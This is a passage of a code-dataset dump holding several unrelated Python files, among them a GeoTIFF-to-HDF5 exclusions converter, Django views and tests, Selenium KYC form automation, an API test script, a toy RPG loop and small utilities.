optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n if excl_h5 is not None and check_tiff:\n cls._check_geotiff(excl_h5, geotiff, chunks=chunks,\n transform_atol=transform_atol,\n coord_atol=coord_atol)\n\n with Geotiff(geotiff, chunks=chunks) as tif:\n profile, values = tif.profile, tif.values\n\n return profile, values\n\n @staticmethod\n def _write_layer(excl_h5, layer, profile, values, chunks=(128, 128),\n description=None, scale_factor=None):\n \"\"\"\n Write exclusion layer to .h5 file\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Dataset name in .h5 file\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n chunks : tuple\n Chunk size of dataset in .h5 file\n description : str\n Description of exclusion layer\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n \"\"\"\n if len(chunks) < 3:\n chunks = (1, ) + chunks\n\n if values.ndim < 3:\n values = np.expand_dims(values, 0)\n\n with h5py.File(excl_h5, mode='a') as f:\n if layer in f:\n ds = f[layer]\n ds[...] = values\n logger.debug('\\t- {} values replaced'.format(layer))\n else:\n ds = f.create_dataset(layer, shape=values.shape,\n dtype=values.dtype, chunks=chunks,\n data=values)\n logger.debug('\\t- {} created and loaded'.format(layer))\n\n ds.attrs['profile'] = json.dumps(profile)\n logger.debug('\\t- Unique profile for {} added:\\n{}'\n .format(layer, profile))\n if description is not None:\n ds.attrs['description'] = description\n logger.debug('\\t- Description for {} added:\\n{}'\n .format(layer, description))\n\n if scale_factor is not None:\n ds.attrs['scale_factor'] = scale_factor\n logger.debug('\\t- scale_factor for {} added:\\n{}'\n .format(layer, scale_factor))\n\n @classmethod\n def _geotiff_to_h5(cls, excl_h5, layer, geotiff, chunks=(128, 128),\n check_tiff=True, transform_atol=0.01, coord_atol=0.001,\n description=None, scale_factor=None, dtype='int16'):\n \"\"\"\n Transfer geotiff exclusions to h5 confirming they match existing layers\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n description : str, optional\n Description of exclusion layer, by default None\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n dtype : str, optional\n Dtype to save geotiff data as in the .h5 file. 
Only used when\n 'scale_factor' is not None, by default 'int16'\n \"\"\"\n logger.debug('\\t- {} being extracted from {} and added to {}'\n .format(layer, geotiff, os.path.basename(excl_h5)))\n\n profile, values = cls._parse_tiff(\n geotiff, excl_h5=excl_h5, chunks=chunks, check_tiff=check_tiff,\n transform_atol=transform_atol, coord_atol=coord_atol)\n\n if scale_factor is not None:\n attrs = {'scale_factor': scale_factor}\n values = Outputs._check_data_dtype(values, dtype, attrs=attrs)\n\n cls._write_layer(excl_h5, layer, profile, values,\n chunks=chunks, description=description,\n scale_factor=scale_factor)\n\n @staticmethod\n def _write_geotiff(geotiff, profile, values):\n \"\"\"\n Write values to geotiff with given profile\n\n Parameters\n ----------\n geotiff : str\n Path to geotiff file to save data to\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n out_dir = os.path.dirname(geotiff)\n if not os.path.exists(out_dir):\n logger.debug(\"Creating {}\".format(out_dir))\n os.makedirs(out_dir)\n\n if values.shape[0] != 1:\n values = np.expand_dims(values, 0)\n\n dtype = values.dtype.name\n profile['dtype'] = dtype\n if np.issubdtype(dtype, np.integer):\n dtype_max = np.iinfo(dtype).max\n else:\n dtype_max = np.finfo(dtype).max\n\n profile['nodata'] = dtype_max\n\n with rasterio.open(geotiff, 'w', **profile) as f:\n f.write(values)\n logger.debug('\\t- {} created'.format(geotiff))\n\n @classmethod\n def _extract_layer(cls, excl_h5, layer, geotiff=None, hsds=False):\n \"\"\"\n Extract given layer from exclusions .h5 file and write to geotiff .tif\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n hsds : bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n logger.debug('\\t - Extracting {} from {}'\n .format(layer, os.path.basename(excl_h5)))\n with ExclusionLayers(excl_h5, hsds=hsds) as f:\n profile = f.get_layer_profile(layer)\n values = f.get_layer_values(layer)\n\n if geotiff is not None:\n logger.debug('\\t- Writing {} to {}'.format(layer, geotiff))\n cls._write_geotiff(geotiff, profile, values)\n\n return profile, values\n\n def geotiff_to_layer(self, layer, geotiff, check_tiff=True,\n transform_atol=0.01, coord_atol=0.001,\n description=None, scale_factor=None, dtype='int16'):\n \"\"\"\n Transfer geotiff exclusions to h5 confirming they match existing layers\n\n Parameters\n ----------\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n description : str, optional\n Description of exclusion layer, by default None\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n dtype : str, optional\n Dtype to save geotiff data as in the .h5 file. 
Only used when\n 'scale_factor' is not None, by default 'int16'\n \"\"\"\n if not os.path.exists(self._excl_h5):\n self._init_h5(self._excl_h5, geotiff, chunks=self._chunks)\n\n if layer in self.layers:\n msg = (\"{} is already present in {}\"\n .format(layer, self._excl_h5))\n if self._replace:\n msg += \" and will be replaced\"\n logger.warning(msg)\n warn(msg)\n else:\n msg += \"; set 'replace' to True to overwrite it\"\n logger.error(msg)\n raise KeyError(msg)\n\n self._geotiff_to_h5(self._excl_h5, layer, geotiff,\n chunks=self._chunks,\n check_tiff=check_tiff,\n transform_atol=transform_atol,\n coord_atol=coord_atol,\n description=description,\n scale_factor=scale_factor,\n dtype=dtype)\n\n def layer_to_geotiff(self, layer, geotiff):\n \"\"\"\n Extract desired layer from .h5 file and write to geotiff .tif\n\n Parameters\n ----------\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n \"\"\"\n self._extract_layer(self._excl_h5, layer, geotiff=geotiff,\n hsds=self._hsds)\n\n @classmethod\n def layers_to_h5(cls, excl_h5, layers, chunks=(128, 128),\n replace=True, check_tiff=True,\n transform_atol=0.01, coord_atol=0.001,\n descriptions=None, scale_factors=None):\n \"\"\"\n Create exclusions .h5 file, or load layers into existing exclusion .h5\n file from provided geotiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n layers : list | dict\n List of geotiffs to load\n or dictionary mapping geotiffs to the layers to load\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n replace : bool, optional\n Flag to replace existing layers if needed, by default True\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n descriptions : dict, optional\n Descriptions of exclusion layers, by default None\n scale_factors : dict, optional\n Scale factors and dtypes to use when scaling given layers,\n by default None\n \"\"\"\n if isinstance(layers, list):\n layers = {os.path.basename(lyr).split('.')[0]: lyr\n for lyr in layers}\n\n if descriptions is None:\n descriptions = {}\n\n if scale_factors is None:\n scale_factors = {}\n\n excls = cls(excl_h5, chunks=chunks, replace=replace)\n logger.info('Creating {}'.format(excl_h5))\n for layer, geotiff in layers.items():\n logger.info('- Transferring {}'.format(layer))\n description = descriptions.get(layer, None)\n scale = scale_factors.get(layer, None)\n if scale is not None:\n scale_factor = scale['scale_factor']\n dtype = scale['dtype']\n else:\n scale_factor = None\n dtype = None\n\n excls.geotiff_to_layer(layer, geotiff, check_tiff=check_tiff,\n transform_atol=transform_atol,\n coord_atol=coord_atol,\n description=description,\n scale_factor=scale_factor,\n dtype=dtype)\n\n @classmethod\n def extract_layers(cls, excl_h5, layers, chunks=(128, 128),\n hsds=False):\n \"\"\"\n Extract given layers from exclusions .h5 file and save to disk\n as GeoTiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n layers : dict\n Dictionary mapping layers to geotiffs to create\n chunks : tuple\n Chunk size of exclusions in .h5 and Geotiffs\n hsds : 
bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n \"\"\"\n excls = cls(excl_h5, chunks=chunks, hsds=hsds)\n logger.info('Extracting layers from {}'.format(excl_h5))\n for layer, geotiff in layers.items():\n logger.info('- Extracting {}'.format(geotiff))\n excls.layer_to_geotiff(layer, geotiff)\n\n @classmethod\n def extract_all_layers(cls, excl_h5, out_dir, chunks=(128, 128),\n hsds=False):\n \"\"\"\n Extract all layers from exclusions .h5 file and save to disk\n as GeoTiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n out_dir : str\n Path to output directory into which layers should be saved as\n GeoTiffs\n chunks : tuple\n Chunk size of exclusions in .h5 and Geotiffs\n hsds : bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n \"\"\"\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n excls = cls(excl_h5, chunks=chunks, hsds=hsds)\n logger.info('Extracting layers from {}'.format(excl_h5))\n for layer in excls.layers:\n geotiff = os.path.join(out_dir, \"{}.tif\".format(layer))\n logger.info('- Extracting {}'.format(geotiff))\n excls.layer_to_geotiff(layer, geotiff)\n","sub_path":"reVX/utilities/exclusions_converter.py","file_name":"exclusions_converter.py","file_ext":"py","file_size_in_byte":24186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34820599","text":"from django.views.generic import ListView, CreateView, UpdateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Post\nfrom .forms import PostForms\n\n\nclass PostListView(ListView):\n model = Post\n ordering = '-created_at'\n template_name = 'home.html'\n\n\nclass PostCreateView(CreateView, LoginRequiredMixin):\n model = Post\n form_class = PostForms\n template_name = 'training/post_create.html'\n success_url = '/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(PostCreateView, self).form_valid(form)\n\n\nclass PostUpdateView(UpdateView, LoginRequiredMixin):\n model = Post\n form_class = PostForms\n template_name = 'training/post_update.html'\n success_url = '/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(PostUpdateView, self).form_valid(form)\n","sub_path":"training/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440922213","text":"#!/usr/bin/env python\n\nimport numpy as np\n\n###make a grid in [c,d], c and d are vectors, with m points in each dimension\n###X is array of vector to form the grid\n\ndef cartesian(X,final=None):\n X=[np.asarray(i) for i in X]\n dtype=X[0].dtype\n n=np.prod([i.size for i in X])\n if final is None:\n final=np.zeros([n,len(X)],dtype=dtype)\n \n m=n/X[0].size\n final[:,0]=np.repeat(X[0],m)\n if X[1:]:\n cartesian(X[1:],final=final[0:m,1:])\n for j in xrange(1,X[0].size):\n final[j*m:(j+1)*m,1:]=final[0:m,1:]\n return final\n\ndef grid (c,d,m):\n k=len(c)\n X=[]\n for i in xrange(k):\n X.append(np.linspace(c[i],d[i],m))\n return cartesian(X)\n","sub_path":"Python/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650613630","text":"from selenium import webdriver\nimport time\nfrom basepage import basepage\nimport re\nimport random\nfrom 
selenium.webdriver.common.action_chains import ActionChains\nimport os\n\nclass kycdata(basepage):\n \"\"\"Wraps the basic operations for fetching email/SMS verification codes and filling in the KYC form\"\"\"\n\n # Initializer: instantiate the driver and pass it to the base class\n def __init__(self):\n self.dr=webdriver.Chrome()\n self.base=basepage(self.dr)\n\n # Click to verify contact info\n def contact(self):\n self.clickweb('button.el-button--primary > span')\n\n # Open the email/SMS page (low-level helper)\n def emailpage(self):\n self.dr.find_element_by_css_selector('div[width=\"200\"] li:nth-of-type(5) > .ivu-menu-submenu-title > span').click()\n time.sleep(1)\n self.dr.find_element_by_css_selector('div[width=\"200\"] [href=\"/report/emailrecord\"]').click()\n time.sleep(1)\n\n # Fetch the email verification code\n def get_emailcode(self,idnum):\n # Switch window\n self.windsw(1)\n time.sleep(1)\n # Enter the main account to filter\n self.css('div.ivu-input-wrapper-default>input').clear()\n time.sleep(1)\n self.inputform('div.ivu-input-wrapper-default>input',idnum)\n time.sleep(1)\n self.clickweb('div.ivu-input-wrapper-default>div.ivu-input-group-append>button>i.ivu-icon-ios-search')\n time.sleep(1)\n # Sort\n self.clickweb('div.ivu-tabs-content > div:nth-of-type(1) th:nth-of-type(5) i:nth-of-type(2)')\n # Fetch the latest verification code\n self.dr.find_element_by_xpath('//div[@class=\"ivu-tabs-content\"]//tr[1]/td[3]').click()\n time.sleep(1)\n self.e = self.dr.find_elements_by_xpath('//div[@class=\"ivu-drawer-wrap\"]//tr[2]//tr[4]/td[1]/span')\n self.t = self.e[0].text\n # Output the verification code\n self.emailcode=re.sub(r'\\D','',self.t) # extract the digits\n print('Current test data email verification code: {}'.format(self.emailcode))\n # Close the popup\n self.tpo=self.dr.find_elements_by_css_selector('a.ivu-drawer-close>i.ivu-icon-ios-close')\n time.sleep(1)\n self.tpo[1].click()\n return self.emailcode\n\n # Fill in the email verification code\n def code_pr(self,idnumber):\n # Click to verify contact info\n self.contact()\n # Send the email verification code\n self.css('div.el-col-24>button.dialog-sendCode').click()\n time.sleep(1)\n # Call the helper to fetch the email verification code\n self.get_emailcode(idnumber)\n self.windsw(0)\n time.sleep(1)\n # Enter the verification code\n time.sleep(1)\n self.inputform('[placeholder=\"验证码\"]',self.emailcode)\n time.sleep(1)\n # Click next\n self.clickweb('button.dialog-submit > span')\n # Click do-it-later\n self.clickweb('.doItLeTer-css')\n # Click done\n self.clickweb('button.dialog-submit > span')\n\n # Upload an image\n def upload_img(self):\n self.css('div.upload-box>div.upload-text>div.icon').click()\n time.sleep(1)\n os.system(r'E:\\test\\client_kyc.exe')\n time.sleep(1)\n\n # Fill in the KYC form\n def kyc_form(self):\n # Upload an image\n self.upload_img()\n time.sleep(1)\n # Randomly pick a gender\n sex = self.dr.find_elements_by_css_selector('label.el-radio>span>span.el-radio__inner')\n sex[random.choice([0, 1])].click()\n time.sleep(1)\n self.css('[placeholder=\"请选择出生日期为DD-MM-YYYY的格式\"]').click()\n time.sleep(1)\n self.css('div.el-date-picker__header > span:nth-of-type(1)').click()\n # Year\n selty = self.dr.find_element_by_css_selector('.el-icon-d-arrow-left')\n ActionChains(self.dr).double_click(selty).perform() # double click\n selty.click()\n time.sleep(1)\n by = self.dr.find_elements_by_css_selector('table.el-year-table>tbody>tr>td')\n by[random.randint(0, 9)].click()\n time.sleep(1)\n # Month\n bm = self.dr.find_elements_by_css_selector('table.el-month-table>tbody>tr>td')\n bm[random.randint(0, 11)].click()\n time.sleep(1)\n # Day\n bd = self.dr.find_elements_by_css_selector('table.el-date-table>tbody>tr>td')\n bd[random.randint(0, 41)].click()\n time.sleep(1)\n # Enter a random ID number\n self.inputform('[placeholder=\"请输入证件号码\"]',self.randomint(8))\n time.sleep(1)\n # Enter a random address\n self.inputform('[placeholder=\"请输入地址\"]',self.randomstr(8))\n # Accept the terms\n self.clickweb('label.agree-checkbox>span.el-checkbox__input>span.el-checkbox__inner')\n time.sleep(1)\n # Submit\n 
self.clickweb('button.submit-btn > span')\n time.sleep(1)\n\n # KYC verification\n def kycfulfill(self,idnum):\n # Phone/email verification\n self.code_pr(idnum)\n time.sleep(2)\n # Fill in the KYC form\n self.kyc_form()\n time.sleep(1)\n self.clickweb('button.side-nav-cell .menu-font') # back to the home page\n time.sleep(1)","sub_path":"creat_accout/registerofcp/kyc_formfill.py","file_name":"kyc_formfill.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"359159036","text":"import datetime\n\nfrom django.test import TestCase\nfrom example.app.widgets.models import Widget, Customer, Purchase, PurchaseItem, Store, User\nfrom unittest import skip\n\n\nclass WidgetTests(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='testuser')\n store = Store.objects.create(owner=user)\n basic_obj = Widget(name='testwidget',\n color='Black',\n size='Small',\n shape='Rectangle',\n store=store)\n basic_obj.save()\n dummy_obj = Widget(name='dummywidget',\n color='Green',\n size='Medium',\n shape='Ellipse',\n store=store)\n dummy_obj.save()\n\n def test_all(self):\n obj = Widget.objects.get(name='testwidget')\n self.assertEqual(obj.name, 'testwidget')\n self.assertEqual(obj.color, 'Black')\n self.assertEqual(obj.size, 'Small')\n self.assertEqual(obj.shape, 'Rectangle')\n\n def test_create_new(self):\n store = Store.objects.first()\n obj = Widget.objects.create(name='otherwidget',\n color='Red',\n size='Large',\n shape='Triangle',\n store=store)\n obj.save()\n\n other = Widget.objects.get(name='otherwidget')\n self.assertEqual(other.name, 'otherwidget')\n self.assertEqual(other.color, 'Red')\n self.assertEqual(other.size, 'Large')\n self.assertEqual(other.shape, 'Triangle')\n\n obj2 = Widget.objects.create(color='Red',\n size='Large',\n shape='Triangle',\n store=store)\n\n self.assertEqual(obj2.name, 'Red.Large.Triangle')\n\nclass PurchaseTests(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='testuser')\n store = Store.objects.create(owner=user)\n widg1 = Widget(name='testwidget',\n color='Black',\n size='Small',\n shape='Rectangle',\n store=store)\n widg1.save()\n widg2 = Widget(name='dummywidget',\n color='Green',\n size='Medium',\n shape='Ellipse',\n store=store)\n widg2.save()\n cust = Customer.objects.create(name='testcust',\n state='Florida',\n gender='M',\n age='29')\n purch1 = Purchase(customer=cust)\n purch1.save()\n purch1.add_item(widg1)\n purch1.add_item(widg2)\n purch1.save()\n\n def test_customer_methods(self):\n cust = Customer.objects.get(name='testcust')\n pur = Purchase.objects.first()\n self.assertEqual(cust.purchases.first(), pur)\n\n self.assertEqual(cust.name, 'testcust')\n self.assertEqual(cust.state, 'Florida')\n self.assertEqual(cust.gender, 'M')\n self.assertEqual(cust.age, 29)\n\n def test_items_added(self):\n purch1 = Purchase.objects.first()\n self.assertQuerysetEqual(purch1.items.all(),\n PurchaseItem.objects.all(),\n transform=lambda x: x,\n ordered=False)\n\n def test_get_customer(self):\n purch1 = Purchase.objects.first()\n self.assertIsInstance(purch1.customer, Customer)\n\n def test_correct_cost(self):\n purch1 = Purchase.objects.first()\n widg1 = Widget.objects.get(name='testwidget')\n widg2 = Widget.objects.get(name='dummywidget')\n pur_cost = purch1.get_cost()\n widg_cost = widg1.cost + widg2.cost\n self.assertEqual(pur_cost, widg_cost)\n\n def test_item_count(self):\n purch1 = Purchase.objects.first()\n self.assertEqual(purch1.items.count(), Widget.objects.all().count())\n\n def 
test_sale_date(self):\n purch1 = Purchase.objects.first()\n self.assertEqual(purch1.sale_date.date(),\n datetime.datetime.now().date())\n\n def test_sale_price_profit(self):\n purch1 = Purchase.objects.first()\n pur_sale_price = purch1.sale_price\n\n widg1 = Widget.objects.get(name='testwidget')\n widg2 = Widget.objects.get(name='dummywidget')\n widg_cost = widg1.cost + widg2.cost\n\n widg_sale_price = round(widg_cost * 1.5, 2)\n self.assertEqual(pur_sale_price, widg_sale_price)\n\n pur_profit = purch1.profit\n widg_profit = round(widg_cost * 0.5, 2)\n self.assertEqual(pur_profit, widg_profit)\n","sub_path":"example/tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"10770113","text":"import time\nimport json\nimport logging\nimport requests\n\ntestLog = logging.getLogger('test')\ntestLog.setLevel(logging.DEBUG)\ntestHandle = logging.StreamHandler()\ntestFormatter = logging.Formatter(\"[%(asctime)s] %(levelname)s %(message)s\", '%Y-%m-%d %H:%M:%S')\ntestHandle.setLevel(logging.DEBUG)\ntestHandle.setFormatter(testFormatter)\ntestLog.addHandler(testHandle)\n\nlogger = logging.getLogger('test')\n\n\nrequest_json = {\n \"req_info\":{\n \"data\":{\n \"si_phonenum\" : '15977798889'\n }\n }\n}\n\n\nclass RequestTest(object):\n # 初始化自动向登录接口获取cookies\n def __init__(self, module_name):\n self.url = \"http://127.0.0.1:8005/api/v1.0/config/%s/\"%module_name\n self.headers = {'user-agent':'Mozilla/5.0','Content-Type':'application/json'}\n self.cookies = self.login_response_data().cookies\n\n # GET 测试\n def get_response_data(self):\n response_data = requests.get(self.url,\n timeout = 30,\n headers = self.headers,\n cookies=self.cookies)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n res = response_data.json()\n return res\n\n # DELETE 测试\n def delete_response_data(self, del_id):\n del_url = self.url + str(del_id) + '/'\n response_data = requests.delete(url = del_url,\n timeout = 30,\n headers = self.headers,\n cookies=self.cookies)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n res = response_data.json()\n time.sleep(5)\n return res['ack_result']['status']\n\n # post 测试\n def post_response_data(self, data):\n response_data = requests.post(self.url,\n json = data,\n timeout = 30,\n headers = self.headers,\n cookies = self.cookies)\n response_data.raise_for_status()\n res = response_data.json()\n return res\n\n # PUT 测试\n def put_response_data(self, put_id, data = request_json):\n put_id = self.url + str(put_id) + '/'\n response_data = requests.put(put_id,\n json = data,\n timeout = 30,\n headers = self.headers,\n cookies = self.cookies)\n response_data.raise_for_status()\n res = response_data.json()\n # 延时请求\n time.sleep(5)\n return res\n\n # 初始登录\n def login_response_data(self):\n url = \"http://127.0.0.1:8005/api/v1.0/commfunc/login/\"\n post_data = {\n \"req_info\":{\n \"data\":{\n \"user_name\": \"hudeli\",\n \"user_password\": \"12345\",\n \"terminal_type\": \"APP\",\n \"adid\":1\n }\n }\n }\n response_data = requests.post(url,\n data = json.dumps(post_data),\n headers = self.headers)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n return response_data\n\n\nif __name__ == '__main__':\n ratio = RequestTest('SysIccard')\n data = ratio.get_response_data()\n\n # 新增测试\n for i in range(30):\n iccard_num = str(time.time())[::-1].replace('.', '') + '%04d' % i\n 
request_json['req_info']['data']['si_cardnum'] = iccard_num\n res = ratio.post_response_data(request_json)\n if res['ack_result']['status'] == 'OK':\n logger.info('SUCCESS %s' % res['ack_result']['info'])\n else:\n logger.error('ERROR %s' % res['ack_result']['info'])\n time.sleep(10)\n\n # # 修改测试\n # if data['ack_result']['data']:\n # id_list = [did['id'] for did in data['ack_result']['data']]\n # for p in map(ratio.put_response_data, id_list):\n # logger.info('PUT SUCCESS %s ' % p['ack_result']['status'])\n\n # # 删除测试\n # if data['ack_result']['data']:\n # id_list = [data['id'] for data in data['ack_result']['data']]\n # for result in map(ratio.delete_response_data,id_list):\n # logger.info('DELETE SUCCESS %s' % result)","sub_path":"python_up/python_web_test/automation/tests_requests/login_delete.py","file_name":"login_delete.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"555193773","text":"from classes.game import Person, bcolors\n\n# Name of Magics Spells\n# Magic\nmagic = [{\"name\" : \"Fire\", \"cost\" : 10, \"dmg\" : 60},\n { \"name\" : \"Thunder\", \"cost\" : 12, \"dmg\" : 80},\n {\"name\": \"Blizzard\", \"cost\" : 10, \"dmg\" : 60}]\n\n# Generate the player and enemy character\nplayer = Person(460, 65, 60, 34, magic)\nenemy = Person(1200, 65, 45, 25, magic)\n\n# Initialise the running variable\nrunning = True\ni = 0 \n\nprint(bcolors.FAIL + bcolors.BOLD + \"AN ENEMY ATTACKS!\"+ bcolors.ENDC)\n\n# Creating the Gaming Loop\n\nwhile running:\n print(\"========================\")\n # Damage done by player to Enemy\n player.choose_action()\n choice = input(\"Choose Action:\")\n index = int(choice) - 1\n if index == 0:\n dmg = player.generate_damage()\n enemy.take_damage(dmg)\n print(\"You attacked for \", dmg, \" points of damage. 
Enemy HP:\", enemy.get_hp())\n \n # Damage done by enemy to player\n enemy_choice = 1\n enemy_dmg = enemy.generate_damage()\n player.take_damage(enemy_dmg)\n print(\"Enemy attacks for \", enemy_dmg, \" Player HP:\", player.get_hp())\n\n\n\n","sub_path":"RPG_battle_script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"675540","text":"from io import open\n\nimport requests_mock\nimport testtools\n\nimport rxv\n\nFAKE_IP = '10.0.0.0'\nDESC_XML = 'http://%s/YamahaRemoteControl/desc.xml' % FAKE_IP\n\n\ndef sample_content(name):\n with open('tests/samples/%s' % name, encoding='utf-8') as f:\n return f.read()\n\n\nclass TestRXV(testtools.TestCase):\n\n @requests_mock.mock()\n def test_basic_object(self, m):\n m.get(DESC_XML, text=sample_content('rx-v675-desc.xml'))\n rec = rxv.RXV(FAKE_IP)\n self.assertEqual(\n rec.ctrl_url,\n 'http://%s/YamahaRemoteControl/ctrl' % FAKE_IP)\n self.assertEqual(\n rec.unit_desc_url,\n 'http://%s/YamahaRemoteControl/desc.xml' % FAKE_IP)\n\n\nclass TestDesc(testtools.TestCase):\n\n @requests_mock.mock()\n def test_discover_zones(self, m):\n m.get(DESC_XML, text=sample_content('rx-v675-desc.xml'))\n rec = rxv.RXV(FAKE_IP)\n zones = rec.zone_controllers()\n self.assertEqual(len(zones), 2, zones)\n self.assertEqual(zones[0].zone, \"Main_Zone\")\n self.assertEqual(zones[1].zone, \"Zone_2\")\n","sub_path":"tests/test_rxv.py","file_name":"test_rxv.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156799204","text":"# util to crop the image\n# initially it was simple just to cut the top\n# now it's becoming advance, seems to be working fine (21.10.2021)\n\nimport numpy as np\n\nCUT_definition = 'Provide a proper argument (float or int) in crop.py\\n\\\n argument between 0 and 1 is percentage, more than 1 is number of pixels\\n\\\ne.g. cut=0.42 is 42% and cut=33 is 33 pixels'\n\nSIDE_definition = \"Provide a proper argument (str or list) in crop.py\\n\\\npossible values are 't' for top, \\\n'b' for bottom, 'l' for left, and 'r' for right. \\\nYou may combine sides -> side='tb' to cut from top and bottom.\\n\"\n\n\ndef crop(img: np.ndarray, side: str = 't', cut: float = 0.2, log: bool = 0) -> np.ndarray:\n \"\"\"\n util to crop the image.\n defaults to 20 % from the top.\\n\n possible values are 't' for top,\n 'b' for bottom, 'l' for left, and 'r' for right.\n You may combine sides -> side='tb' to cut from top and bottom.\\n\n argument between 0 and 1 is percentage, more than 1 is number of pixels\n e.g. 
cut=0.42 is 42% and cut=33 is 33 pixels.\\n\n log=1 to print dimensions.\n \"\"\"\n if not isinstance(side, (str, list)):\n raise SystemExit(SIDE_definition)\n if not isinstance(cut, (float, int)):\n raise SystemExit(CUT_definition)\n if 0 < cut < 1:\n method = 'percent'\n elif cut > 1:\n method = 'pixel'\n else:\n raise SystemExit(CUT_definition)\n top, left = 0, 0\n bottom = img.shape[0]\n right = img.shape[1]\n if cut > bottom or cut > right:\n raise SystemExit('Arguments are bigger than image dimensions.\\\n Check value of in crop.py')\n if 't' in side:\n top = calculate(bottom, method, cut)\n if 'b' in side:\n bottom = bottom - calculate(bottom, method, cut)\n if 'l' in side:\n left = calculate(right, method, cut)\n if 'r' in side:\n right = right - calculate(right, method, cut)\n if log:\n print(f'arguments provided: side={side}, cut={cut}, log={log}')\n print(f\"original dimensions are {img.shape}\")\n print('top, bottom, left, right: ', top, bottom, left, right)\n print(F\"cropped dimensions are {img[top:bottom, left:right].shape}\")\n return img[top:bottom, left:right]\n\n\ndef calculate(side, method, cut) -> int:\n \"\"\"\n small util for crop function.\n calculates the new side value.\n \"\"\"\n if method == 'percent':\n return int(side * cut)\n if method == 'pixel':\n return int(cut)\n","sub_path":"testmy/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"333981840","text":"from app import db\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n\nclass FundRaiser(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n ngoName = db.Column(db.String(80))\n fundRaisingName = db.Column(db.String(80))\n amountCollected = db.Column(db.Integer)\n amountTargeted = db.Column(db.Integer)\n\n def __init__(self, ngoName, fundRaisingName, amountTargeted):\n self.ngoName = ngoName\n self.fundRaisingName = fundRaisingName\n self.amountTargeted = amountTargeted","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 